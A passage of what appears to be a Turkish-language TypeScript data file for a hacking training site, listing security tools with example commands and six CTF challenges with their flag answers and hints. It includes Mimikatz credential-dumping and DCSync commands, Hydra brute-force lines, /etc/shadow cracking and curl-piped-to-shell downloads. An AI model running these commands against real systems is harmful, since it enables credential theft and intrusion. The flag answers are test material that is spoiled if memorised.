    name: 'Mimikatz',
    category: 'Exploit',
    difficulty: 'advanced',
    version: '2.2.0-20220919',
    os: ['Windows'],
    description: 'Windows kimlik bilgisi dump aracı. LSASS\'tan şifre hash ve cleartext çıkarma.',
    install: '# Windows üzerinde çalışır (AV devre dışı veya bypass gerekebilir)\n# GitHub: gentilkiwi/mimikatz\n# PowerShell alternatif: Invoke-Mimikatz',
    flags: [
      { flag: 'privilege::debug',            description: 'Debug yetkisi al (gerekli)' },
      { flag: 'sekurlsa::logonpasswords',    description: 'LSASS\'tan tüm şifreler' },
      { flag: 'sekurlsa::pth',              description: 'Pass-the-Hash saldırısı' },
      { flag: 'lsadump::sam',               description: 'SAM veritabanı dökümü' },
      { flag: 'lsadump::dcsync',            description: 'DCSync ile NTDS hash al' },
      { flag: 'kerberos::golden',           description: 'Golden Ticket oluştur' },
    ],
    examples: [
      { command: 'privilege::debug\nsekurlsa::logonpasswords', description: 'Tüm cleartext ve hash\'leri al' },
      { command: 'lsadump::dcsync /domain:domain.local /user:Administrator', description: 'Domain admin hash DCSync' },
    ],
    tags: ['windows', 'credential-dumping', 'pass-the-hash', 'active-directory'],
  },

  // ── Şifre ─────────────────────────────────────────────────────────────────────

  {
    id: 'hydra',
    name: 'Hydra',
    category: 'Şifre',
    difficulty: 'beginner',
    version: '9.5',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Çevrimiçi şifre brute force aracı. 50+ protokol desteği.',
    install: 'sudo apt install hydra',
    flags: [
      { flag: '-l / -L', description: 'Tek kullanıcı / kullanıcı listesi' },
      { flag: '-p / -P', description: 'Tek şifre / şifre listesi' },
      { flag: '-t',      description: 'Thread sayısı' },
      { flag: '-s',      description: 'Port belirt' },
      { flag: '-V',      description: 'Her denemeyi göster' },
      { flag: '-f',      description: 'İlk başarıda dur' },
    ],
    examples: [
      { command: 'hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1', description: 'SSH brute force' },
      { command: 'hydra -L users.txt -P pass.txt ftp://hedef -t 4', description: 'FTP liste ile saldırı' },
      { command: "hydra -l admin -P rockyou.txt hedef http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'", description: 'HTTP form brute force' },
    ],
    tags: ['brute-force', 'password', 'ssh'],
  },
  {
    id: 'hashcat',
    name: 'Hashcat',
    category: 'Şifre',
    difficulty: 'intermediate',
    version: '6.2.6',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'GPU destekli hash kırma aracı. Dünya\'nın en hızlı hash cracker\'ı.',
    install: 'sudo apt install hashcat',
    flags: [
      { flag: '-m',     description: 'Hash modu (0=MD5, 1000=NTLM, 1800=sha512)' },
      { flag: '-a',     description: 'Saldırı modu (0=dictionary, 3=brute)' },
      { flag: '-o',     description: 'Sonuç dosyası' },
      { flag: '--show', description: 'Kırılmış hash\'leri göster' },
      { flag: '-r',     description: 'Rule dosyası' },
    ],
    examples: [
      { command: 'hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt', description: 'MD5 dictionary saldırısı' },
      { command: 'hashcat -m 1000 ntlm_hashes.txt wordlist.txt -r rules/best64.rule', description: 'NTLM + rule tabanlı' },
      { command: 'hashcat -m 1800 shadow.hash wordlist.txt --force', description: 'SHA-512 Unix hash kır' },
    ],
    tags: ['password', 'hash', 'gpu'],
  },
  {
    id: 'john',
    name: 'John the Ripper',
    category: 'Şifre',
    difficulty: 'beginner',
    version: '1.9.0-jumbo',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Çok formatlı hash kırma aracı. /etc/shadow ve offline analiz için.',
    install: 'sudo apt install john',
    flags: [
      { flag: '--wordlist',    description: 'Kelime listesi belirt' },
      { flag: '--format',      description: 'Hash formatı (md5, sha1, bcrypt)' },
      { flag: '--rules',       description: 'Kural tabanlı mutasyon' },
      { flag: '--show',        description: 'Kırılmış şifreleri göster' },
      { flag: '--incremental', description: 'Brute force modu' },
    ],
    examples: [
      { command: 'john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt', description: 'Dictionary saldırısı' },
      { command: 'unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt', description: 'Shadow dosyası kır' },
      { command: 'ssh2john id_rsa > ssh_hash.txt && john ssh_hash.txt --wordlist=rockyou.txt', description: 'SSH key şifresi kır' },
    ],
    tags: ['password', 'hash', 'offline'],
  },

  // ── Keşif ─────────────────────────────────────────────────────────────────────

  {
    id: 'linpeas',
    name: 'LinPEAS',
    category: 'Keşif',
    difficulty: 'intermediate',
    version: 'latest',
    os: ['Linux'],
    description: 'Linux Privilege Escalation otomatik kontrol scripti. Renk kodlu çıktı.',
    install: 'curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh',
    flags: [
      { flag: '-a', description: 'Tüm kontrolleri çalıştır' },
      { flag: '-s', description: 'Sessiz mod (sadece kritik)' },
      { flag: '-q', description: 'Hızlı mod' },
    ],
    examples: [
      { command: 'curl -s http://sunucu/linpeas.sh | bash', description: 'Doğrudan indir ve çalıştır' },
      { command: './linpeas.sh 2>/dev/null | tee linpeas_output.txt', description: 'Çıktıyı kaydet' },
      { command: "./linpeas.sh -a 2>/dev/null | grep -A5 '99%\\|95%'", description: 'Kritik bulguları filtrele' },
    ],
    tags: ['privesc', 'linux', 'post-exploitation'],
  },
  {
    id: 'amass',
    name: 'Amass',
    category: 'Keşif',
    difficulty: 'intermediate',
    version: '4.2.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Kapsamlı subdomain keşif aracı. 50+ veri kaynağı ile attack surface haritalama.',
    install: 'go install -v github.com/owasp-amass/amass/v4/...@master\n# veya:\nsudo apt install amass',
    flags: [
      { flag: 'enum -d <domain>',  description: 'Subdomain enumeration' },
      { flag: '-passive',          description: 'Sadece pasif kaynaklar' },
      { flag: '-active',           description: 'Aktif tarama dahil' },
      { flag: '-o <file>',         description: 'Sonuçları dosyaya kaydet' },
      { flag: 'viz -d3',           description: 'D3 görselleştirme' },
    ],
    examples: [
      { command: 'amass enum -d hedef.com -passive',     description: 'Pasif subdomain keşfi' },
      { command: 'amass enum -d hedef.com -active -o subdomains.txt', description: 'Aktif keşif + kaydet' },
      { command: 'amass intel -whois -d hedef.com',      description: 'WHOIS kayıtları ile keşif' },
    ],
    tags: ['subdomain', 'recon', 'attack-surface', 'osint'],
  },
  {
    id: 'sublist3r',
    name: 'Sublist3r',
    category: 'Keşif',
    difficulty: 'beginner',
    version: '1.1',
    os: ['Linux', 'macOS'],
    description: 'Subdomain listeleme aracı. Google, Yahoo, Bing, Baidu ve daha fazla kaynak kullanır.',
    install: 'pip3 install sublist3r\n# veya:\ngit clone https://github.com/aboul3la/Sublist3r && pip3 install -r requirements.txt',
    flags: [
      { flag: '-d <domain>',  description: 'Hedef domain' },
      { flag: '-b',           description: 'Brute force ile subliste' },
      { flag: '-t <threads>', description: 'Thread sayısı' },
      { flag: '-o <file>',    description: 'Çıktı dosyası' },
      { flag: '-e <engines>', description: 'Motor seç (google,bing,yahoo)' },
    ],
    examples: [
      { command: 'python3 sublist3r.py -d hedef.com',            description: 'Temel subdomain tarama' },
      { command: 'python3 sublist3r.py -d hedef.com -b -t 30',   description: 'Brute force ile kapsamlı' },
      { command: 'python3 sublist3r.py -d hedef.com -o subs.txt', description: 'Dosyaya kaydet' },
    ],
    tags: ['subdomain', 'recon', 'osint'],
  },
  {
    id: 'recon-ng',
    name: 'Recon-ng',
    category: 'Keşif',
    difficulty: 'intermediate',
    version: '5.1.2',
    os: ['Linux', 'macOS'],
    description: 'OSINT ve web keşif framework. Modüler yapısı ile profesyonel bilgi toplama.',
    install: 'sudo apt install recon-ng\n# veya:\ngit clone https://github.com/lanmaster53/recon-ng',
    flags: [
      { flag: 'marketplace search',    description: 'Modül ara' },
      { flag: 'marketplace install',   description: 'Modül kur' },
      { flag: 'modules load',          description: 'Modül yükle' },
      { flag: 'options set SOURCE',    description: 'Hedef domain seç' },
      { flag: 'run',                   description: 'Modülü çalıştır' },
    ],
    examples: [
      { command: 'recon-ng -w hedef_workspace', description: 'Yeni workspace oluştur' },
      { command: "marketplace install recon/domains-hosts/hackertarget\nmodules load recon/domains-hosts/hackertarget\noptions set SOURCE hedef.com\nrun", description: 'HackerTarget ile host keşfi' },
    ],
    tags: ['recon', 'osint', 'framework', 'subdomain'],
  },

  // ── Tersine ───────────────────────────────────────────────────────────────────

  {
    id: 'gdb',
    name: 'GDB + pwndbg',
    category: 'Tersine',
    difficulty: 'advanced',
    version: '14.2 + pwndbg 2024.02',
    os: ['Linux', 'macOS'],
    description: 'GNU Debugger. Binary analiz ve exploit geliştirme için pwndbg eklentisi ile.',
    install: 'sudo apt install gdb\npip3 install pwndbg\n# veya:\ngit clone https://github.com/pwndbg/pwndbg && ./setup.sh',
    flags: [
      { flag: 'r / run',        description: 'Programı başlat' },
      { flag: 'b *0xaddress',   description: 'Breakpoint koy' },
      { flag: 'c / continue',   description: 'Devam et' },
      { flag: 'ni / si',        description: 'Sonraki komut (over/into)' },
      { flag: 'x/20wx $esp',    description: 'Stack\'i incele' },
      { flag: 'info registers', description: 'Register değerleri' },
      { flag: 'disas <func>',   description: 'Fonksiyonu disassemble et' },
      { flag: 'checksec',       description: 'Güvenlik korumalarını göster' },
    ],
    examples: [
      { command: 'gdb ./binary\n(gdb) checksec\n(gdb) disas main\n(gdb) b *main+50\n(gdb) run', description: 'Temel analiz akışı' },
      { command: "python3 -c \"print('A'*100)\" | gdb ./vuln", description: 'Overflow testi' },
    ],
    tags: ['reverse', 'debugger', 'exploit-dev'],
  },
  {
    id: 'ghidra',
    name: 'Ghidra',
    category: 'Tersine',
    difficulty: 'advanced',
    version: '11.1.2',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'NSA tarafından geliştirilen açık kaynaklı tersine mühendislik çerçevesi.',
    install: '# https://ghidra-sre.org/ adresinden indir\n# Java 17+ gerekli:\nsudo apt install default-jre\nunzip ghidra_*.zip && ./ghidraRun',
    flags: [
      { flag: 'CodeBrowser',     description: 'Assembly ve decompile görünümü' },
      { flag: 'Decompiler',      description: 'C benzeri kod üretir' },
      { flag: 'Symbol Tree',     description: 'Fonksiyon ve string listesi' },
      { flag: 'Search → Memory', description: 'Binary içinde ara' },
    ],
    examples: [
      { command: './support/analyzeHeadless ./ghidra_proj myProject -import binary.exe -postScript analyze.py', description: 'Headless otomatik analiz' },
    ],
    tags: ['reverse', 'static-analysis', 'decompiler'],
  },
  {
    id: 'radare2',
    name: 'Radare2',
    category: 'Tersine',
    difficulty: 'advanced',
    version: '5.9.4',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Açık kaynak binary analiz framework. Disassemble, debug, patch ve exploit desteği.',
    install: 'sudo apt install radare2\n# veya:\ngit clone https://github.com/radareorg/radare2 && sys/install.sh',
    flags: [
      { flag: 'aaa',          description: 'Kapsamlı analiz (tüm fonksiyonlar)' },
      { flag: 'afl',          description: 'Fonksiyon listesi' },
      { flag: 'pdf @main',    description: 'main fonksiyonunu disassemble et' },
      { flag: 'iz',           description: 'String\'leri listele' },
      { flag: 'px 64 @esp',   description: 'Stack\'e bak' },
      { flag: 'db 0xaddr',    description: 'Breakpoint koy' },
      { flag: 'V',            description: 'Visual mode' },
    ],
    examples: [
      { command: 'r2 -A ./binary\n[0x...]> afl\n[0x...]> pdf @main', description: 'Analiz ve main disassembly' },
      { command: 'r2 -d ./binary\n[0x...]> db main\n[0x...]> dc', description: 'Debug modu ile çalıştır' },
    ],
    tags: ['reverse', 'binary-analysis', 'debugger', 'disassembler'],
  },
  {
    id: 'binwalk',
    name: 'Binwalk',
    category: 'Tersine',
    difficulty: 'intermediate',
    version: '2.4.3',
    os: ['Linux', 'macOS'],
    description: 'Firmware analizi, embedded dosya sistemi çıkarma ve binary inceleme.',
    install: 'sudo apt install binwalk',
    flags: [
      { flag: '-e',  description: 'Dosyaları çıkar' },
      { flag: '-E',  description: 'Entropi analizi yap' },
      { flag: '-A',  description: 'OpCode\'ları tara' },
      { flag: '-M',  description: 'İç içe dosyaları tara (matryoshka)' },
    ],
    examples: [
      { command: 'binwalk firmware.bin',   description: 'Dosya imzalarını tara' },
      { command: 'binwalk -e firmware.bin', description: 'İçerikleri çıkar' },
      { command: 'binwalk -E firmware.bin', description: 'Şifreli bölümleri tespit et' },
    ],
    tags: ['firmware', 'forensics', 'reverse'],
  },

  // ── Forensics ─────────────────────────────────────────────────────────────────

  {
    id: 'volatility',
    name: 'Volatility',
    category: 'Forensics',
    difficulty: 'intermediate',
    version: '3.0.1',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Bellek dökümü (RAM) analizi için en gelişmiş araç. CTF forensics\'in vazgeçilmezi.',
    install: 'pip3 install volatility3',
    flags: [
      { flag: 'windows.pslist',   description: 'Çalışan processleri listele' },
      { flag: 'windows.netscan',  description: 'Ağ bağlantılarını göster' },
      { flag: 'windows.dumpfiles', description: 'Dosyaları çıkar' },
      { flag: 'windows.hashdump', description: 'NTLM hash\'leri al' },
      { flag: 'linux.bash',       description: 'Bash geçmişini al' },
    ],
    examples: [
      { command: 'python3 vol.py -f memory.dmp windows.pslist',   description: 'Process listesi' },
      { command: 'python3 vol.py -f memory.dmp windows.cmdline',  description: 'Process komut satırları' },
      { command: 'python3 vol.py -f memory.dmp windows.filescan | grep ".txt"', description: 'Metin dosyalarını bul' },
    ],
    tags: ['forensics', 'memory', 'incident-response'],
  },

  // ── OSINT ─────────────────────────────────────────────────────────────────────

  {
    id: 'shodan',
    name: 'Shodan CLI',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '1.31',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'İnternet\'e açık cihazları bulan arama motoru. IoT, kamera, SCADA.',
    install: 'pip3 install shodan && shodan init <API_KEY>',
    flags: [
      { flag: 'shodan search',  description: 'Arama yap' },
      { flag: 'shodan host',    description: 'IP hakkında bilgi' },
      { flag: 'shodan count',   description: 'Sonuç sayısı' },
      { flag: 'shodan stats',   description: 'İstatistikler' },
    ],
    examples: [
      { command: 'shodan search "apache country:TR"',                  description: 'Türkiye\'deki Apache sunucular' },
      { command: 'shodan host 1.2.3.4',                                description: 'IP adres raporu' },
      { command: 'shodan search "port:22 country:TR" --limit 100',     description: 'SSH açık Türkiye IP\'leri' },
    ],
    tags: ['osint', 'recon', 'internet-scan'],
  },
  {
    id: 'theharvester',
    name: 'theHarvester',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '4.4.3',
    os: ['Linux', 'macOS'],
    description: 'Domain bazlı e-posta, subdomain ve çalışan bilgisi toplama.',
    install: 'sudo apt install theharvester',
    flags: [
      { flag: '-d', description: 'Hedef domain' },
      { flag: '-b', description: 'Kaynak (google, bing, linkedin, shodan)' },
      { flag: '-l', description: 'Sonuç limiti' },
      { flag: '-f', description: 'HTML/XML rapor çıktısı' },
    ],
    examples: [
      { command: 'theHarvester -d hedef.com -b google,bing,linkedin', description: 'Çoklu kaynak tarama' },
      { command: 'theHarvester -d hedef.com -b shodan -f rapor',      description: 'Shodan + HTML rapor' },
    ],
    tags: ['osint', 'email', 'recon'],
  },
  {
    id: 'maltego',
    name: 'Maltego',
    category: 'OSINT',
    difficulty: 'intermediate',
    version: 'CE 4.7',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Grafik tabanlı istihbarat platformu. Kişi, kurum, IP ve domain ilişki haritası.',
    install: '# maltego.com\'dan Community Edition indir (ücretsiz)\n# Java 11+ gerekli:\nsudo apt install default-jre\n# İndirdikten sonra kayıt gerekli',
    flags: [
      { flag: 'Transforms',         description: 'Veri dönüşüm motoru' },
      { flag: 'Entity Types',       description: 'Kişi, domain, IP, org vb.' },
      { flag: 'Run All Transforms', description: 'Tüm kaynaklardan sorgula' },
      { flag: 'Graph View',         description: 'İlişki haritası görselleştir' },
    ],
    examples: [
      { command: '# Domain üzerinde çalışma\n1. Yeni graph aç\n2. Domain entity ekle: hedef.com\n3. Run All Transforms\n4. Bağlı subdomainleri ve IP\'leri gör', description: 'Domain intel toplama' },
    ],
    tags: ['osint', 'visualization', 'intelligence', 'graph'],
  },
  {
    id: 'spiderfoot',
    name: 'SpiderFoot',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '4.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Otomatik OSINT toplama platformu. 200+ veri kaynağı, web arayüzü ile kullanım.',
    install: 'pip3 install spiderfoot\n# veya:\ngit clone https://github.com/smicallef/spiderfoot\npip3 install -r requirements.txt',
    flags: [
      { flag: '-l <ip:port>',    description: 'Web arayüzünü başlat' },
      { flag: '-s <target>',     description: 'CLI ile hedef belirt' },
      { flag: '-m <modules>',    description: 'Belirli modülleri çalıştır' },
      { flag: '-t <type>',       description: 'Hedef tipi (DOMAIN, IP, NAME)' },
      { flag: '-o <format>',     description: 'Çıktı formatı (tab, csv, json)' },
    ],
    examples: [
      { command: 'python3 sf.py -l 127.0.0.1:5001', description: 'Web arayüzünü başlat (tarayıcıda aç)' },
      { command: 'python3 sf.py -s hedef.com -t DOMAIN -o csv > rapor.csv', description: 'CLI ile domain tarama' },
    ],
    tags: ['osint', 'automation', 'reconnaissance', 'internet'],
  },
]

// ─── Challenges ───────────────────────────────────────────────────────────────

export const CHALLENGES: Challenge[] = [
  {
    level: 1,
    title: 'KEŞİF',
    path: 'challenges/01-recon',
    difficulty: 'KOLAY',
    color: '#00ff41',
    description: 'cat, wc -l ve /etc/passwd ile sistem keşfi yap. Gizli bayrak dosyasını bul.',
    flagKey: 'FLAG{r3con_master_l1nux}',
    hints: [
      'ls -la komutu ile tüm dosyaları (gizliler dahil) listele',
      'Gizli dosyalar nokta (.) ile başlar — örneğin .hidden_flag',
      'cat .hidden_flag komutu ile dosya içeriğini oku',
    ],
  },
  {
    level: 2,
    title: 'DOSYA İZİNLERİ',
    path: 'challenges/02-perms',
    difficulty: 'KOLAY',
    color: '#00ff41',
    description: 'chmod ile izin yönetimi. Kısıtlı dosyaya erişim sağla ve bash script çalıştır.',
    flagKey: 'FLAG{ch4mod_p3rm1ss10ns}',
    hints: [
      'ls -la ile dosya izinlerini incele — hangi dosya okunamıyor?',
      'chmod +r <dosya> ile okuma izni ekleyebilirsin',
      'Dosyayı okunduktan sonra içindeki komutu çalıştır: bash script.sh',
    ],
  },
  {
    level: 3,
    title: 'GİZLİ DOSYALAR',
    path: 'challenges/03-hidden',
    difficulty: 'ORTA',
    color: '#f59e0b',
    description: 'Derinlemesine dizin taraması. Bayrak birçok iç içe gizli dizinde saklanmış.',
    flagKey: 'FLAG{h1dden_1n_pl41n_s1ght}',
    hints: [
      'find komutu ile arama yap: find . -name "*.txt" 2>/dev/null',
      'Gizli dizinler de nokta ile başlar — find . -type d -name ".*"',
      'find /home/operator -name "flag*" 2>/dev/null tüm dizini tarar',
    ],
  },
  {
    level: 4,
    title: 'GREP USTASI',
    path: 'challenges/04-grep',
    difficulty: 'ORTA',
    color: '#f59e0b',
    description: 'access.log içinde kalıp arama. Binlerce log satırından bayrağı filtrele.',
    flagKey: 'FLAG{gr3p_1s_p0w3r}',
    hints: [
      'grep komutu ile metin ara: grep "FLAG" access.log',
      'grep -r ile tüm dizini tara: grep -r "FLAG" .',
      'grep -r "FLAG{" . --include="*.log" sadece log dosyalarını tarar',
    ],
  },
  {
    level: 5,
    title: 'YETKİ YÜKSELTMESİ',
    path: 'challenges/05-privesc',
    difficulty: 'ZOR',
    color: '#ef4444',
    description: 'SUID, sudo -l ve crontab ile privesc vektörlerini bul. Root\'a yüksel.',
    flagKey: 'FLAG{pr1v3sc_r00t_0wn3d}',
    hints: [
      'sudo -l komutu ile hangi komutları yetkisiz çalıştırabileceğini gör',
      'SUID bit\'li dosyaları bul: find / -perm -4000 2>/dev/null',
      '/etc/crontab ve /var/spool/cron/crontabs kontrol et — hangi job çalışıyor?',
    ],
  },
  {
    level: 6,
    title: 'AĞ ANALİZİ',
    path: 'challenges/06-network',
    difficulty: 'ZOR',
    color: '#ef4444',
    description: 'netstat/ss ile açık portlar, ağ servisleri ve log analizi ile bayrak bul.',
    flagKey: 'FLAG{n3tw0rk_m4st3r_2024}',
    hints: [
      'ss -tuln veya netstat -tuln ile tüm açık portları listele',
      'İlginç bir port bulursan nc ile bağlan: nc localhost <port>',
      'cat /var/log/syslog | grep -i "flag" ile log dosyalarında ara',
    ],
  },
]
